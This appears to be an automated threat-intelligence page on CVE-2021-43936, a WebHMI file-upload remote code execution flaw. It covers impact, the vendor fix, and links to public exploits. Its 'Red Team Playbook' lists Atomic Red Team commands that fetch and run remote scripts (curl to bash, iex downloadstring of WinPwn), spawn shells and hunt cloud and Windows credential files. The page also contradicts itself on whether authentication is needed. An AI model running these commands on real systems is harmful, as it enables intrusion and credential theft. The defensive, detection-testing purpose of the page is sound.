CVE-2021-43936
Overview
This vulnerability is an unrestricted file upload flaw affecting the Distributed Data Systems WebHMI portal. The root cause lies in inadequate validation and sanitization of uploaded file types, allowing dangerous files to be transferred and processed within the product's environment. The affected component is the WebHMI file upload functionality, which fails to restrict or verify file content and extensions properly.
Vulnerability Description
The software allows the attacker to upload or transfer files of dangerous types to the WebHMI portal, that may be automatically processed within the product's environment or lead to arbitrary code execution.
Impact
An unauthenticated remote attacker can exploit this vulnerability to upload and execute arbitrary code on the WebHMI system, potentially gaining full control over the affected device. The attack requires only network access to the WebHMI portal and no user interaction or privileges. Successful exploitation can result in complete system compromise, data manipulation, and disruption of industrial control processes. The CVSS vector indicates high confidentiality, integrity, and availability impact with no privileges or user interaction needed (AV:N/AC:L/PR:N/UI:N).
Solution
Distributed Data Systems has addressed this vulnerability in updated WebHMI firmware versions as detailed in the US-CERT ICS advisory ICSA-21-336-03. Users should apply the latest firmware updates provided by the vendor to remediate the issue. Additional technical details and patch instructions are available at https://us-cert.cisa.gov/ics/advisories/icsa-21-336-03. Until updates are applied, restricting network access to the WebHMI portal is recommended as a temporary mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the WebHMI portal arises from inadequate validation of file uploads, allowing attackers to transfer files of potentially harmful types. This flaw exposes the system to various threats, as the software fails to properly restrict the types of files that can be uploaded. Attackers can exploit this weakness by uploading malicious scripts or executables that the system may inadvertently process. The lack of stringent checks means that once these files are uploaded, they can be executed within the product's environment, leading to arbitrary code execution. This situation is particularly concerning given the critical nature of the environments in which WebHMI is often deployed, such as industrial control systems and other operational technology settings.
The primary attack vector involves an attacker gaining access to the WebHMI portal, which could occur through phishing, social engineering, or exploiting other vulnerabilities in the network. Once inside, the attacker can upload files that the system does not adequately filter. For instance, an attacker could upload a web shell disguised as a benign file type, which, when executed by the server, grants the attacker remote control over the system. This exploitation scenario not only poses a direct threat to the integrity and confidentiality of the system but also opens the door to lateral movement within the network, potentially compromising other connected systems.
The real-world impact of this vulnerability can be significant, particularly for organizations relying on WebHMI for critical operations. The potential for arbitrary code execution means that an attacker could manipulate system functions, disrupt operations, or even exfiltrate sensitive data. The business risks associated with such an incident include financial losses due to downtime, damage to reputation, and potential legal ramifications stemming from data breaches. Additionally, the operational technology sector is often governed by strict compliance and regulatory requirements, and a successful exploit could lead to severe penalties and increased scrutiny from regulatory bodies.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. First, they should conduct a thorough audit of their WebHMI configurations and file upload mechanisms to ensure that only safe file types are permitted. Employing file type validation and sanitization techniques can significantly reduce the risk of malicious file uploads. Additionally, organizations should monitor file upload activities and implement intrusion detection systems to identify and alert on suspicious behavior. Regular security training for employees can also help mitigate risks associated with social engineering attacks, which are often the first step in exploiting such vulnerabilities.
In conclusion, the vulnerability in the WebHMI portal poses a critical threat to organizations that utilize this software. The potential for arbitrary code execution through malicious file uploads can lead to severe operational disruptions and data breaches. By understanding the technical details of the vulnerability, recognizing the various attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves against this significant cybersecurity risk. It is essential for businesses to remain vigilant and proactive in their cybersecurity efforts to safeguard their systems and data from evolving threats.
CSURFACE threat intelligence has identified a marked escalation in the exploitability potential of CVE-2021-43936, reflected by a significant increase in its EPSS score over the past reporting period. This upward trend indicates growing attacker interest and an expanding likelihood of exploitation attempts targeting Distributed Data Systems WebHMI environments. The availability of new proof-of-concept exploits on public platforms further lowers the barrier for adversaries to weaponize this vulnerability, potentially accelerating the pace of attacks. Although the vulnerability was already classified as critical, this development elevates its immediacy and underscores an increased risk of operational disruption and unauthorized code execution within affected systems. Defenders should recognize that the threat landscape surrounding this vulnerability is intensifying, with our telemetry confirming a sustained upward trajectory in exploitation risk. Consequently, the overall threat level for organizations relying on WebHMI firmware should be considered heightened, warranting continued vigilance in monitoring and response efforts.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Webhmi | Webhmi Firmware | All |
cpe:2.3:o:webhmi:webhmi_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated) | Jeremiasz Pluta | webapps | php | - | View |
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
LongWayHomie/CVE-2021-43936
CVE-2021-43936 is a critical vulnerability (CVSS3 10.0) leading to Remote Code Execution (RCE) in WebHMI Firmware.
|
LongWayHomie | 9 | 7 | 2021-12-12 | View |
Threat Feed
2 eventsProof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-43936 |
| us-cert.cisa.gov |
GitHub CVE
x_refsource_MISC
|
https://us-cert.cisa.gov/ics/advisories/icsa-21-336-03 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/165252/WebHMI-4.0-Remote-Code-Execution.html |